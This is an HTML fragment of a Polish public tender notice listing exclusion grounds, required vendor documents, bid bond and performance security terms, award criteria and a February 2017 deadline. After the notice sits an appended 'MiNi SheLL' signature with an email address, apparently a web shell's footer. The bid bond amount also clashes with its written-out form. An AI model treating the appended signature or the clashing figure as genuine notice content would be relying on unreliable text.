                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">7.2.3. Wykaz oświadczeń lub dokumentów składanych przez Wykonawcę, którego 
          oferta została najwyżej oceniona w postępowaniu, na wezwanie Zamawiającego 
          w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 3 ustawy 
          Pzp: 	
7.2.3.1. Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności 
             gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, 
             w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 
             1 ustawy - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu 
             składania ofert; 
/Wymagana forma dokumentu  oryginał lub kopia poświadczona za
zgodność z oryginałem przez Wykonawcę/
7.2.3.2. Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że 
             Wykonawca nie zalega z opłacaniem podatków lub inny dokument
             potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem
             podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami
             lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie,
             odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości
             wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3
             miesiące przed upływem terminu składania ofert;  
/Wymagana forma dokumentu  oryginał lub kopia poświadczona za
zgodność z oryginałem przez Wykonawcę/
7.2.3.3. Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu
             Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego    
            albo inny dokument potwierdzający, że Wykonawca nie zalega z opłacaniem
            składek na ubezpieczenia społeczne lub zdrowotne lub inny dokument 
            potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem w 
            sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w 
            szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub 
            rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania 
            decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed 
            upływem terminu składania ofert;  
 /Wymagana forma dokumentu  oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę/ 
7.2.4. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium
          Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt od 7.2.3.1
          do 7.2.3.3 - składa dokument lub dokumenty wystawione w kraju, w którym ma
          siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a)  nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne
     lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie
     spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w
     szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub 
             rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania
             decyzji właściwego organu, 
b)  nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
7.2.5. Dokumenty, o których mowa w pkt 7.2.4 lit. a powinny być wystawione nie
          wcześniej niż 3 miesiące przed upływem terminu składania ofert. Dokumenty, o
          których mowa w pkt 7.2.4 lit. b powinny być wystawione nie wcześniej niż 6
          miesięcy przed upływem terminu składania ofert. 
7.2.6. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub
          miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się
          dokumentów, o których mowa w pkt 7.2.4., zastępuje się je dokumentem
          zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo
          osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument
          miał dotyczyć, złożone przed notariuszem lub przed organem sądowym,
          administracyjnym albo organem samorządu zawodowego lub gospodarczego
          właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub
          miejsce zamieszkania tej osoby. Przepis pkt 7.2.5. stosuje się odpowiednio. 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />    7.1.2.1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich  
                 pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia 
                 działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, 
                 wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te 
                 zostały wykonane, stanowiący oświadczenie zgodne z treścią Załącznika Nr 5 
                 do SIWZ  Doświadczenie Wykonawcy; 
/Wymagana forma dokumentu  oryginał/
 Do wykazu należy dołączyć dowody określające czy te roboty budowlane
 zostały wykonane należycie, w szczególności informacje o tym czy roboty
 zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo
 ukończone, przy czym dowodami, o których mowa, są referencje bądź inne
 dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane
 były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym
 charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  inne
 dokumenty; 
/Wymagana forma dokumentów  oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę/
  7.1.2.2.  Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia  
                publicznego, w szczególności odpowiedzialnych za kierowanie robotami
                budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych i 
                uprawnień niezbędnych do wykonania zamówienia publicznego, a także 
                zakresu wykonywanych przez nie czynności oraz informacją o podstawie do 
                dysponowania tymi osobami, stanowiący oświadczenie zgodne z treścią 
                Załącznika Nr 6 do SIWZ  Potencjał Kadrowy; 
/Wymagana forma dokumentu  oryginał/
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">  nie dotyczy</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. W terminie 3 dni od zamieszczenia na stronie internetowej Zamawiającego 
informacji z otwarcia ofert, o której mowa w art. 86 ust. 5 ustawy Pzp, Wykonawca zobowiązany jest przekazać Zamawiającemu oświadczenie Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej, zgodne z treścią Załącznika Nr 7 do SIWZ;/Wymagana forma dokumentu  oryginał/.
2. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował  niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając      zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów
na potrzeby realizacji zmówienia - zobowiązanie powinno być podpisane przez
osoby upoważnione do reprezentowania tych podmiotów i należy je złożyć wraz z ofertą; /Wymagana forma dokumentu  oryginał/
3. Dowód wniesienia wadium należy dołączyć do oferty zgodnie z postanowieniami pkt 14.5.2 SIWZ.
4. Wypełniony Formularz OFERTA zgodny z treścią wzoru zamieszczonego w Specyfikacji  Załącznik Nr 1 do SIWZ wraz z kosztorysem ofertowym.
5. Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu albo do
reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba
reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub
innym dokumencie. W przypadku Wykonawców wspólnie ubiegających się o
udzielenie zamówienia pełnomocnictwo do reprezentowania Wykonawców
wspólnie ubiegających się o udzielenie zamówienia albo do reprezentowania  
Wykonawców wspólnie ubiegających się o udzielenie zamówienia i zawarcia
umowy. 
Uwaga: W przypadku ustanowienia Pełnomocnika spoza grona Wykonawców
wspólnie ubiegających się o udzielenie zamówienia, pełnomocnictwo musi być
podpisane przez wszystkich Wykonawców. Podpisy muszą być złożone przez osoby upoważnione do składania oświadczeń woli w imieniu Wykonawców. 


</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wykonawca jest zobowiązany do wniesienia wadium w wysokości 20 000,00 zł
          (słownie złotych: dwadzieścia złotych zero groszy). 
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin gwarancji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">Umowa zostanie zawarta z wybranym Wykonawcą na warunkach określonych we "Wzorze Umowy" stanowiącym Załącznik Nr 2 do Specyfikacji.</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px">Wykonawca przed podpisaniem umowy będzie zobowiązany do wniesienia
zabezpieczenia należytego wykonania umowy, stanowiącego 5 % ceny całkowitej
ceny oferty łącznie z VAT) podanej w ofercie. 
</div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px">Zabezpieczenie należytego wykonania umowy może być wnoszone według wyboru 
         Wykonawcy w jednej lub w kilku następujących formach: 
	pieniądzu, przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Brodnicy. Nr rachunku 22 9484 1150 1400 0101 2014 0030
	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
	gwarancjach bankowych, 
	gwarancjach ubezpieczeniowych, 
	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
</div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zakres, charakter zmian  oraz warunki wprowadzenia zmian zawiera szczegółowo " Wzór Umowy" stanowiący Załącznik Nr 2 do Specyfikacji. <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/02/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com